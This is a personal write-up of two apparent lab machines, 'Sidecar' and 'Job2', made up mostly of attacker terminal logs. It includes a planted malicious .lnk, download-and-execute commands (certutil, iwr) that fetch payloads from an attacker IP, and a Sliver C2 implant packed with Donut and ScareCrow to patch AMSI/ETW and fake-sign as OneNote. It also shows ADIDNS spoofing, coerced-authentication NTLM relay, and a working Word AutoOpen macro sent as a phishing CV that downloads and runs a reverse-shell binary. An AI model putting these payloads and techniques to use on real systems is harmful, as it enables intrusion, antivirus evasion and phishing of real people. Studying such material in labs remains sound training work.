smb: \Common\> cd Custom
smb: \Common\Custom\> ls
  .                                   D        0  Sun Dec 17 12:14:14 2023
  ..                                  D        0  Sun Dec 17 12:09:03 2023
  info.txt                            A       45  Sun Dec 10 17:08:38 2023

        6291455 blocks of size 4096. 2227210 blocks available

smb: \Common\Custom\> rm *.lnk
smb: \Common\Custom\> put hillie3.lnk
putting file hillie3.lnk as \Common\Custom\hillie3.lnk (22.8 kb/s) (average 0.4 kb/s)
smb: \Common\Custom\> ls
  .                                   D        0  Wed Jul 17 16:30:06 2024
  ..                                  D        0  Sun Dec 17 12:09:03 2023
  hillie3.lnk                         A     2006  Wed Jul 17 16:30:06 2024
  info.txt                            A       45  Sun Dec 10 17:08:38 2023

        6291455 blocks of size 4096. 2237771 blocks available
smb: \Common\Custom\>

Serving the shell

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ python3 -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.143.214 - - [17/Jul/2024 16:26:20] "GET /rcat.exe HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:30:16] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:32:20] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:33:20] "GET /puckshell.txt HTTP/1.1" 200 -

 

Getting the shell

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ rlwrap nc -nlvp 443                        
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.143.214] 49817
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\WINDOWS\System32\WindowsPowerShell\v1.0>whoami
sidecar\e.klaymore

C:\WINDOWS\System32\WindowsPowerShell\v1.0>cd c:\users\

c:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\Users

11/30/2023  11:55 PM    <DIR>          .
11/30/2023  11:55 PM    <DIR>          ..
01/12/2024  05:59 PM    <DIR>          Admin
12/02/2023  01:24 PM    <DIR>          administrator
01/12/2024  05:50 PM    <DIR>          e.klaymore
11/30/2023  05:49 PM    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)   3,720,708,096 bytes free

c:\Users>cd e.klaymore

c:\Users\e.klaymore>cd desktop

c:\Users\e.klaymore\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\Users\e.klaymore\Desktop

12/01/2023  09:26 AM    <DIR>          .
12/01/2023  09:26 AM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)   3,720,572,928 bytes free

c:\Users\e.klaymore\Desktop>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

c:\Users\e.klaymore\Desktop>net users

User accounts for \\WS01

-------------------------------------------------------------------------------
Admin                    Administrator            DefaultAccount           
Deployer                 Gast                     
The command completed successfully.


c:\Users\e.klaymore\Desktop>

so we have

c:\Users\e.klaymore\Desktop>net user

User accounts for \\WS01

-------------------------------------------------------------------------------
Admin                    Administrator            DefaultAccount           
Deployer                 Gast                     
The command completed successfully.


c:\Users\e.klaymore\Desktop>net user /domain
The request will be processed at a domain controller for domain Sidecar.vl.


User accounts for \\DC01.Sidecar.vl

-------------------------------------------------------------------------------
A.Roberts                Administrator            E.Klaymore               
Guest                    J.Chaffrey               krbtgt                   
M.smith                  O.osvald                 P.robinson               
svc_deploy               
The command completed successfully.

.

c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/nc64.exe nc64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\temp

07/17/2024  05:57 PM    <DIR>          .
07/17/2024  05:57 PM    <DIR>          ..
07/17/2024  05:57 PM            45,272 nc64.exe
               1 File(s)         45,272 bytes
               2 Dir(s)   3,713,388,544 bytes free

Start Sliver C2

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sudo systemctl start sliver
[sudo] password for puck: 
                                                                                             
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver                     
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain deathtouch
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > generate --mtls 10.8.2.138 --os windows --arch amd64 --format exe 

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 20s
[*] Implant saved to /home/puck/vulnlab/sidecar/EVIL_USUAL.exe

sliver >  

Let’s donut this file

┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ./donut payload.exe            

  [ Donut shellcode generator v0.9.3
  [ Copyright (c) 2019 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "payload.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : x86+amd64
  [ AMSI/WDLP     : continue
  [ Shellcode     : "loader.bin"
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ls
donut  donut.1  EVIL_USUAL.exe  examples  lib  LICENSE  loader.bin  payload.exe  README.html

Then Scarecrow the file

┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ./ScareCrow -I loader.bin --domain microsoft.com
 
  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
    \/     \/     \/            \/        \/                      
                            (@Tyl0us)
    “Fear, you must understand is more than a mere obstacle. 
    Fear is a TEACHER. the first one you ever had.”
    
[!] Missing Garble... Downloading it now
[*] Encrypting Shellcode Using ELZMA Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[+] Patched AMSI Enabled
[+] Sleep Timer set for 2584 milliseconds 
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With OneNote's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing OneNote.exe With a Fake Cert
[+] Signed File Created
[+] Binary Compiled
[!] Sha256 hash of OneNote.exe: ad60fffef99119074e16c057982bc80cb5b4bf56f97006f6ca3de989d547ddb6
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ls
Cryptor  go.sum       Loader      main.json    README.md  ScareCrow.go  Struct
go.mod   limelighter  loader.bin  OneNote.exe  ScareCrow  Screenshots   Utils
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ 

got a session, but after uploading SharpHound.exe , my sliver session gets disconnected

sliver > sessions

[*] No sessions 🙁

[*] Session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:52:52 CEST

sliver > use 2a9abc07-3992-40be-918f-375eee061970

[*] Active session EVIL_USUAL (2a9abc07-3992-40be-918f-375eee061970)

sliver (EVIL_USUAL) > info

        Session ID: 2a9abc07-3992-40be-918f-375eee061970
              Name: EVIL_USUAL
          Hostname: ws01
              UUID: ec2f60bf-8718-2ae6-cabf-54c56e35f9d2
          Username: SIDECAR\E.Klaymore
               UID: S-1-5-21-3976908837-939936849-1028625813-1609
               GID: S-1-5-21-3976908837-939936849-1028625813-513
               PID: 3812
                OS: windows
           Version: 10 build 10240 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: mtls://10.8.2.138:8888
    Remote Address: 10.10.151.22:49977
         Proxy URL: 
Reconnect Interval: 1m0s
     First Contact: Thu Jul 18 08:52:52 CEST 2024 (41s ago)
      Last Checkin: Thu Jul 18 08:52:52 CEST 2024 (41s ago)

sliver (EVIL_USUAL) > ls

c:\temp (2 items, 33.6 MiB)
===========================
-rw-rw-rw-  nc64.exe  44.2 KiB  Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe   33.6 MiB  Thu Jul 18 08:49:01 +0200 2024


sliver (EVIL_USUAL) > whoami 

Logon ID: SIDECAR\E.Klaymore
[*] Current Token ID: SIDECAR\E.Klaymore
sliver (EVIL_USUAL) > upload SharpHound.exe

[*] Wrote file to c:\temp\SharpHound.exe

sliver (EVIL_USUAL) > ls

c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw-  nc64.exe        44.2 KiB    Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe         33.6 MiB    Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw-  SharpHound.exe  1022.0 KiB  Thu Jul 18 08:54:33 +0200 2024


sliver (EVIL_USUAL) > upload SharpHound.exe

[*] Wrote file to c:\temp\SharpHound.exe

sliver (EVIL_USUAL) > ls

c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw-  nc64.exe        44.2 KiB    Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe         33.6 MiB    Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw-  SharpHound.exe  1022.0 KiB  Thu Jul 18 08:54:53 +0200 2024


[!] Lost session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:55:31 CEST

[!] Active session disconnected

sliver (EVIL_USUAL) > execute-assembly -i -E /SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"

So we need the beacon.exe in a new lnk file

C:\Windows\System32\cmd.exe /c powershell -c iwr http://10.8.2.138/beacon.exe -o C:\windows\tasks\beacon.exe; C:\windows\tasks\beacon.exe

.

created a working beacon, and transfered it to the box with

certutil.exe -urlcache -f http://10.8.2.138/powerpoint.exe power.exe

and runned c:\programdata\power.exe on the box

.

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain persist
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 

sliver > https --lport 8443

[*] Starting HTTPS :8443 listener ...

[*] Successfully started job #2

[!] Job #2 stopped (tcp/https)

[!] Job #2 stopped (tcp/https)

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 

               

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 

[*] Beacon f4937c47 sitecar-3 - 10.10.177.38:50444 (ws01) - windows/amd64 - Mon, 14 Oct 2024 20:21:04 CEST

sliver > use f4937c47-c290-4c60-a7bc-438fcf292b8d

[*] Active beacon sitecar-3 (f4937c47-c290-4c60-a7bc-438fcf292b8d)

sliver (sitecar-3) > whoami

Logon ID: SIDECAR\E.Klaymore
[*] Tasked beacon sitecar-3 (952ffb7c)

[+] sitecar-3 completed task 952ffb7c


sliver (sitecar-3) >  

.

sliver (sitecar-3) > sharp-hound-4 -i -s -t 120 -- -c all,gpolocalgroup

[*] Tasked beacon sitecar-3 (15da41ae)

sliver (sitecar-3) > ls

[*] Tasked beacon sitecar-3 (a86427ba)

[+] sitecar-3 completed task a86427ba

c:\ProgramData\temp (0 items, 0 B)
==================================


[+] sitecar-3 completed task 15da41ae

[*] sharp-hound-4 output:
2024-10-23T08:49:59.4279652+02:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-10-23T08:49:59.8243987+02:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2024-10-23T08:49:59.8747021+02:00|INFORMATION|Initializing SharpHound at 8:49 AM on 10/23/2024
2024-10-23T08:50:00.0784908+02:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for Sidecar.vl : DC01.Sidecar.vl

2024-10-23T08:50:48.7730432+02:00|INFORMATION|Saving cache with stats: 295 ID to type mappings.
 297 name to SID mappings.
 2 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-10-23T08:50:48.8487177+02:00|INFORMATION|SharpHound Enumeration Completed at 8:50 AM on 10/23/2024! Happy Graphing!

[*] Output saved to /tmp/sharp-hound-4_.2445145387.log

sliver (sitecar-3) > ls

[*] Tasked beacon sitecar-3 (0b9f5da2)

[+] sitecar-3 completed task 0b9f5da2

c:\ProgramData\temp (2 items, 83.9 KiB)
=======================================
-rw-rw-rw-  20241023085045_BloodHound.zip                         31.2 KiB  Wed Oct 23 08:50:48 +0200 2024
-rw-rw-rw-  Y2RjZTMzZTktMzhkNS00MDAwLTkwZTUtM2MwNDdmM2QyMzRj.bin  52.7 KiB  Wed Oct 23 08:50:48 +0200 2024


sliver (sitecar-3) > download 20241023085045_BloodHound.zip

[*] Tasked beacon sitecar-3 (44459e36)

[+] sitecar-3 completed task 44459e36

[*] Wrote 31936 bytes (1 file successfully, 0 files unsuccessfully) to /home/puck/vulnlab/sidecar/20241023085045_BloodHound.zip

sliver (sitecar-3) >  

To be continued …

1st we need to promote our beacon to a session to be able to run execute shellcode

 

Warning: if we use the interactive-shellcode session, we need to restart the sliver server afterwards to execute assemblies

thus like this

sliver > sessions 

[*] No sessions 🙁

[*] Beacon e5de6c1f sitecar-3 - 10.10.173.118:50379 (ws01) - windows/amd64 - Fri, 25 Oct 2024 08:55:46 CEST

sliver > use e5de6c1f-8a91-454b-9154-8006649aa751

[*] Active beacon sitecar-3 (e5de6c1f-8a91-454b-9154-8006649aa751)

sliver (sitecar-3) > interactive 

[*] Using beacon's active C2 endpoint: https://10.8.2.138:8443
[*] Tasked beacon sitecar-3 (85062590)

[*] Session 23eb3ba7 sitecar-3 - 10.10.173.118:50418 (ws01) - windows/amd64 - Fri, 25 Oct 2024 08:57:02 CEST

sliver (sitecar-3) > use 23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39

[*] Active session sitecar-3 (23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39)

sliver (sitecar-3) > sessions

 ID         Transport   Remote Address        Hostname   Username             Operating System   Health  
========== =========== ===================== ========== ==================== ================== =========
 23eb3ba7   http(s)     10.10.173.118:50418   ws01       SIDECAR\E.Klaymore   windows/amd64      [ALIVE] 

sliver (sitecar-3) > ^C
input Ctrl-c once more to exit
sliver (sitecar-3) > ^C
interrupted
                                                                                                                     

and then run execute-shellcode -i /tmp/UnmanagedPowerShell.bin

sliver (sitecar-3) > ^C
interrupted
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

    ███████╗██╗     ██╗██╗   ██╗███████╗██████╗
    ██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗
    ███████╗██║     ██║██║   ██║█████╗  ██████╔╝
    ╚════██║██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗
    ███████║███████╗██║ ╚████╔╝ ███████╗██║  ██║
    ╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝

All hackers gain fear
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

sliver > sessions

 ID         Transport   Remote Address        Hostname   Username             Operating System   Health  
========== =========== ===================== ========== ==================== ================== =========
 23eb3ba7   http(s)     10.10.173.118:50418   ws01       SIDECAR\E.Klaymore   windows/amd64      [ALIVE] 

sliver > use 23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39

[*] Active session sitecar-3 (23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39)

sliver (sitecar-3) > execute-shellcode -i /tmp/UnmanagedPowerShell.bin

[*] Started remote shell with pid 2108

PS > dir


    Directory: C:\temp


Mode                LastWriteTime         Length Name                                              
----                -------------         ------ ----                                              
-a----       10/25/2024   8:53 AM       24830704 power.exe                                         



PS > New-ADIDNSNode -Tombstone -Verbose -Node puck.sidecar.vl -Data 10.8.2.138
VERBOSE: [+] Domain Controller = DC01.Sidecar.vl
VERBOSE: [+] Domain = Sidecar.vl
VERBOSE: [+] Forest = Sidecar.vl
VERBOSE: [+] ADIDNS Zone = Sidecar.vl
VERBOSE: [+] Distinguished Name = DC=puck.sidecar.vl,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=Sidecar,DC=vl
VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-18-01-00-00-00-00-02-58-00-00-00-00-0F-B0-38-00-0A-08-02-8A
[+] ADIDNS node puck.sidecar.vl added

PS > 

.

sliver (sitecar-3) > execute-assembly -i -E /tmp/SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"

snip...2024-10-25T12:13:31.9634793+02:00|INFORMATION|Saving cache with stats: 58 ID to type mappings.
 59 name to SID mappings.
 1 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-10-25T12:13:31.9939532+02:00|INFORMATION|SharpHound Enumeration Completed at 12:13 PM on 10/25/2024! Happy Graphing!

*] Tasked beacon sitecar-3 (e2afe45b)

[+] sitecar-3 completed task e2afe45b

we can see that we can’t create new machine accounts [ms-ds-machineaccountquota=0]

sliver (sitecar-3) > inline-execute-assembly /tmp/StandIn_v13_Net45.exe "--object ms-DS-MachineAccountQuota=*"

[*] Tasked beacon sitecar-3 (189947d6)

sliver (sitecar-3) > execute-assembly /tmp/StandIn_v13_Net45.exe "--object ms-DS-MachineAccountQuota=*"

[*] Tasked beacon sitecar-3 (c7f43d96)

sliver (sitecar-3) > tasks 

 ID         State       Message Type            Created                          Sent                             Completed                      
========== =========== ======================= ================================ ================================ ================================
 c7f43d96   sent        InvokeExecuteAssembly   Fri, 25 Oct 2024 15:39:01 CEST   Fri, 25 Oct 2024 15:39:07 CEST                                  
 74051079   sent        RegisterExtension       Fri, 25 Oct 2024 15:37:55 CEST   Fri, 25 Oct 2024 15:37:59 CEST                                  
 189947d6   sent        CallExtension           Fri, 25 Oct 2024 15:37:55 CEST   Fri, 25 Oct 2024 15:37:59 CEST                                  
 a730ea0b   completed   Download                Fri, 25 Oct 2024 15:18:49 CEST   Fri, 25 Oct 2024 15:18:56 CEST   Fri, 25 Oct 2024 15:18:56 CEST 
 db7bfb31   completed   Pwd                     Fri, 25 Oct 2024 15:18:19 CEST   Fri, 25 Oct 2024 15:18:22 CEST   Fri, 25 Oct 2024 15:18:22 CEST 


[+] sitecar-3 completed task c7f43d96

[*] Output:

[?] Using DC : DC01.Sidecar.vl
[?] Object   : DC=Sidecar
    Path     : LDAP://DC=Sidecar,DC=vl

[?] Iterating object properties

[+] ridmanagerreference
    |_ CN=RID Manager$,CN=System,DC=Sidecar,DC=vl
[+] objectcategory
    |_ CN=Domain-DNS,CN=Schema,CN=Configuration,DC=Sidecar,DC=vl
[+] msds-nctype
    |_ 0
[+] systemflags
    |_ -1946157056
[+] minpwdage
    |_ -864000000000
[+] dscorepropagationdata
    |_ 1/1/1601 12:00:00 AM
[+] uascompat
    |_ 0
[+] usnchanged
    |_ 110627
[+] instancetype
    |_ 5
[+] creationtime
    |_ 133743100080295319
[+] pwdhistorylength
    |_ 24
[+] ms-ds-machineaccountquota
    |_ 0
[+] subrefs
    |_ DC=ForestDnsZones,DC=Sidecar,DC=vl
    |_ DC=DomainDnsZones,DC=Sidecar,DC=vl
    |_ CN=Configuration,DC=Sidecar,DC=vl
[+] lockoutduration
    |_ -18000000000
[+] name
    |_ Sidecar

.

this means we can’t perform a RBCD Attack https://www.thehacker.recipes/a-d/movement/kerberos/delegations/rbcd#rbcd-on-spn-less-users as we would need another computer or service account which we control

sliver (sitecar-3) > execute-shellcode -i /payloads/UnmanagedPowerShell.bin

[*] Started remote shell with pid 1652

PS > pwd

Path            
----            
C:\Windows\Tasks

.

# on sliver
[server] sliver (sitecar-3) > socks5 start

[*] Started SOCKS5 127.0.0.1 1081  

# on local machine
proxychains -q nxc smb 192.168.100.101 -u 'puck' -p ''

.

Webdav

We first need the authentication request or hash from our machine account. As we cant relay SMB to SMB (or LDAP) we need to change our source to HTTP.
For this we need to enable Webdav (https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/webclient)

We can check the current status using https://github.com/G0ldenGunSec/GetWebDAVStatus/

from session ( not beacon ) run

sliver (sitecar-3) > upload GetWebDAVStatus.exe

[*] Wrote file to c:\Windows\Tasks\GetWebDAVStatus.exe

sliver (sitecar-3) > execute -o "GetWebDAVStatus.exe" "127.0.0.1" 

[*] Output:
[+] WebClient service is active on 127.0.0.1

sliver (sitecar-3) > execute "cmd.exe" "/c net use h: http://10.8.2.138/blub"

[*] Command executed successfully

sliver (sitecar-3) >  

DNS

Webdav is only working if we use a DNS name for our target, so we first need to add a new DNS entry to the AD. https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/adidns-spoofing

For this we can use Powermad (https://github.com/Kevin-Robertson/Powermad) even in a new spawned interactive shell

I used this sliver shellcode: https://github.com/mmnoureldin/UnmanagedPowerShell?tab=readme-ov-file which also contains Powermad

warning : If we use the interactive-shellcode session, we need to restart the sliver server afterwards to execute assemblies

So we execute-shellcode -i /payloads/UnmanagedPowerShell.bin , and then we add a dns entry with New-ADIDNSNode -Tombstone -Verbose -Node kali.sidecar.vl -Data 10.8.2.138

.

sliver (sitecar-3) > execute-shellcode -i /payloads/UnmanagedPowerShell.bin

[*] Started remote shell with pid 3364

PS > pwd

Path            
----            
C:\Windows\Tasks



PS > New-ADIDNSNode -Tombstone -Verbose -Node kali.sidecar.vl -Data 10.8.2.138
VERBOSE: [+] Domain Controller = DC01.Sidecar.vl
VERBOSE: [+] Domain = Sidecar.vl
VERBOSE: [+] Forest = Sidecar.vl
VERBOSE: [+] ADIDNS Zone = Sidecar.vl
VERBOSE: [+] Distinguished Name = DC=kali.sidecar.vl,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=Sidecar,DC=vl
VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-1E-01-00-00-00-00-02-58-00-00-00-00-62-B1-38-00-0A-08-02-8A
[+] ADIDNS node kali.sidecar.vl added

PS > 

WebDav to LDAP relay

Finally we need to trigger the http authentication with Petitpotam or SpoolSample

.

Thus now, we exit, and restart the SliverC2 server

then we execute

execute-assembly -i -E /payloads/payloads/SpoolSample.exe “10.8.2.138 kali.sidecar.vl@80/blub.txt”
inline-execute-assembly /payloads/SpoolSample.exe “10.18.2.138 vulnlab@80/blub.txt”

.

thus

sliver (sitecar-3) > use b31f8184-a729-480c-b757-1ac3a3e67669

[*] Active session sitecar-3 (b31f8184-a729-480c-b757-1ac3a3e67669)

sliver (sitecar-3) > whoami

Logon ID: SIDECAR\E.Klaymore
[*] Current Token ID: SIDECAR\E.Klaymore
sliver (sitecar-3) > execute-assembly -i -E /payloads/SpoolSample.exe "10.8.2.138 kali.sidecar.vl@80/blub.txt"

[!] rpc error: code = Unknown desc = implant timeout
sliver (sitecar-3) >  

 

catch it

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ impacket-ntlmrelayx -t ldaps://dc01 --shadow-credentials --shadow-target 'ws01$'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.185.38, attacking target ldaps://dc01
[!] The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP)
[-] Authenticating against ldaps://dc01 as SIDECAR/E.KLAYMORE FAILED
[*] HTTPD(80): Client requested path: /puckshell.txt

Now at problem  error:

The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP).

to be continued …

.

vulnlab-job2

job2 a hard windows machine , from phising to admin

Preperation

1. Enable Developer Tools in the Ribbon Menu to gain access to macros
2. Name your Macro AutoOpen() if you are working with Word 2016+
3. Select the Current Document as the place to store the Macro
4. Don’t use .docx as the file extension since it won’t allow for embedded macros. Either use .doc or .docm

Do the testing on your lan 1st ( a kali box and a windows11 pc )

i used this macro

Sub AutoOpen()

  a = Shell("""curl"" ""192.168.1.41/rcat.exe"" ""-o"" ""C:\Windows\tasks\rcat_192.168.1.41_443.exe""", vbHide)
  b = Shell("C:\Windows\tasks\rcat_192.168.1.41_443.exe", vbHide)

End Sub

Open the puck3.docm 2 times, 1st to download rcat, and 2nd time to execute rcat.exe

If you receive a reverse shell , start the job2 box , to get the job2

Here we go …

We start with a nmap scan

Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-11 10:58 CEST
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.93% done; ETC: 10:59 (0:00:00 remaining)
Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 85.00% done; ETC: 11:00 (0:00:00 remaining)
Nmap scan report for job2.vl (10.10.122.114)
Host is up (0.019s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 a39477ca160eecfb238667c60ae3ca7b (RSA)
|   256 0e2a317094995d95d4f840d5b5368e88 (ECDSA)
|_  256 29312ac355b2f773f2d3bdbcc5c114f0 (ED25519)
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
111/tcp  open  rpcbind
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Not valid before: 2023-05-09T13:31:40
|_Not valid after:  2122-05-09T13:41:37
|_http-title: Not Found
445/tcp  open  microsoft-ds?
1063/tcp open  rpcbind
2049/tcp open  rpcbind
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-07-11T08:59:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=JOB2
| Not valid before: 2024-07-10T08:57:44
|_Not valid after:  2025-01-09T08:57:44
Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-07-11T08:59:22
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.18 seconds

We examine  a website, and find out how to apply for the job2

Send your CV 2 times ( of course 1st modify your test ip on lan to your tun0 ip of the vulnhub vpn. in the macro of puck3.docm

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ sendemail -s job2.vl -f "puck <puck@vulnlab.com>" -t hr@job2.vl -o tls=no -m "hey pls check my cv http://10.8.2.138/test" -a puck3.docm 

Jun 30 15:53:21 kali sendemail[35338]: Email was sent successfully!

Catch the shell

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.122.114 - - [11/Jul/2024 11:06:23] "GET /rcat.exe HTTP/1.1" 200 -

 

